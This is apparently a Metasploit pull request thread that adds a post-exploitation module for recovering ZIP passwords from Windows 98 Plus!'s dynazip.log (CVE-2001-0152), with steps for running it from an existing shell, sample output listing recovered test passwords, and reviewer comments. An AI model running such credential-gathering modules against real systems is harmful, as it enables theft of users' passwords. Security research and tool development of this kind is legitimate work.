### PR TITLE
Add Windows Gather DynaZIP Saved Password Extraction post module

### PR DESCRIPTION
**Pull request by bcoles**
This PR adds a module to extract passwords from dynazip.log ([CVE-2001-0152](https://cvedetails.com/cve/CVE-2001-0152/)).

Tested on Microsoft Plus! 98

## Verification

- [x] Install Microsoft® Windows Plus! 98 from CD-ROM
- [x] Create a Compressed Folder
- [x] Encrypt the Compressed Folder using the right-click context menu
- [x] Start `msfconsole`
- [x] Get a shell
- [x] `use post/windows/gather/credentials/dynazip_log`
- [x] `set session 1`
- [x] `run`
- [x] Admire your password in the module output
- [x] Apply the [patch for Windows 98](http://web.archive.org/web/20060506010950/http://download.microsoft.com/download/win98/update/14715/w98/en-us/252694usa8.exe) (source: archive.org)
- [x] Reboot
- [x] Get a shell
- [x] `use post/windows/gather/credentials/dynazip_log`
- [x] `set session 2`
- [x] `run`
- [x] Admire your password in the module output (note the patch neither removed nor cleared the log file)
- [x] Merge this PR
- [x] `cd C:\DOOM95`
- [x] `start DOOM95.EXE`

### Output

```
msf post(dynazip_log) > exploit 

[+] Found DynaZip log file: C:\WINDOWS\dynazip.log
[+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
[+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
[+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
[+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'

ZIP Passwords
=============

File Path                                   Password
---------                                   --------
C:\WINDOWS\Desktop\earthbound.zip           fuzzy pickles
C:\WINDOWS\Desktop\private.zip              priv8
C:\WINDOWS\Desktop\secret.zip               my secret password!
C:\WINDOWS\Desktop\thepasswordisaspace.zip   

[*] Post module execution completed
```

```
msf post(dynazip_log) > set verbose true
verbose => true
msf post(dynazip_log) > exploit 

[+] Found DynaZip log file: C:\WINDOWS\dynazip.log
[*] Processing log file (6614 bytes)
[*] Processing log entry for C:\WINDOWS\Desktop\secret.zip
[+] File: 'C:\WINDOWS\Desktop\secret.zip' -- Password: 'my secret password!'
[*] Processing log entry for C:\WINDOWS\Desktop\private.zip
[+] File: 'C:\WINDOWS\Desktop\private.zip' -- Password: 'priv8'
[*] Processing log entry for C:\WINDOWS\Desktop\thepasswordisaspace.zip
[+] File: 'C:\WINDOWS\Desktop\thepasswordisaspace.zip' -- Password: ' '
[*] Processing log entry for C:\WINDOWS\Desktop\earthbound.zip
[+] File: 'C:\WINDOWS\Desktop\earthbound.zip' -- Password: 'fuzzy pickles'
[*] Processing log entry for C:\WINDOWS\Desktop\this file is not encrypted.zip
[*] Did not find a password

ZIP Passwords
=============

File Path                                   Password
---------                                   --------
C:\WINDOWS\Desktop\earthbound.zip           fuzzy pickles
C:\WINDOWS\Desktop\private.zip              priv8
C:\WINDOWS\Desktop\secret.zip               my secret password!
C:\WINDOWS\Desktop\thepasswordisaspace.zip   

[*] Post module execution completed
```

### CODE REVIEW

File: modules/post/windows/gather/credentials/dynazip_log.rb [hunk 1]
```diff
@@ -0,0 +1,158 @@
...
+      'Columns'   => ['File Path', 'Password']
+    )
+    creds.each {|c| table << c }
+    print_line
+    print_line(table.to_s)
+  end
+end
+
+
+=begin
```
Comment (h00die) [inline modules/post/windows/gather/credentials/dynazip_log.rb]: This comment block is the **perfect** thing to put in markdown docs.  Having the background info like this is amazing.
Please remove from here and add to markdown doc

**Comment by h00die** [comment]
Please add documentation.  [template](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/module_doc_template.md), [example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/local/overlayfs_priv_esc.md)

**Comment by wwebb-r7** [comment]
I'm a little swamped wrapping up my PHF scanner.  Give me some time and I'll get it landed.

**Comment by h00die** [comment]
MSF originally released in 2003, this module pre-dates MSF.  Amazing!!!

**Comment by h00die** [comment]
docs look great to me!

**Comment by bcoles** [comment]
@wwebb-r7 No worries. This PR can probably wait a couple more weeks.

[CVE-2001-0152](https://cvedetails.com/cve/CVE-2001-0152/) celebrates its 16th Birthday on March 27th 2017. :birthday: :tada: :balloon:

**Comment by bwatters-r7** [comment]
My copy of windows 98 plus should be here today..... I'll try and test this tomorrow.....

**Comment by bwatters-r7** [comment]
Well..... crap.  It appears that my CD has a problem.  I'd forgottent he charming dll-hell that was Win98, and it looks like there's a missing dll somewhere that is required for networking to work.
image

More stuff is shown as missing when I try to get the Adapter working.  I'll poke at it for a bit, but I'm less positive than I was.

**Comment by bcoles** [comment]
@bwatters-r7 I feel your pain.

Unfortunately Microsoft&reg; no longer supports Windows Plus! 98.

Fortunately you can pick up a copy of [Windows 98 Answers!](https://www.amazon.com/Windows-Answers-Certified-Tech-Support/dp/0078824559) for only US$5.96 (including shipping), which might help solve your networking issues.

Windows 98 Answers! Certified Tech Support

**Comment by bwatters-r7** [comment]
@bcoles, no worries.  I hope that the problem is just damaged media.  I have another disc on the way, so I'll set this aside for a few days, then get back to it.

**Comment by bwatters-r7** [comment]
# Release notes
This module adds the ability to parse and retrieve passwords for zip files encrypted using Windows 98 Plus!'s dynazip functionality.

**Pull request merged**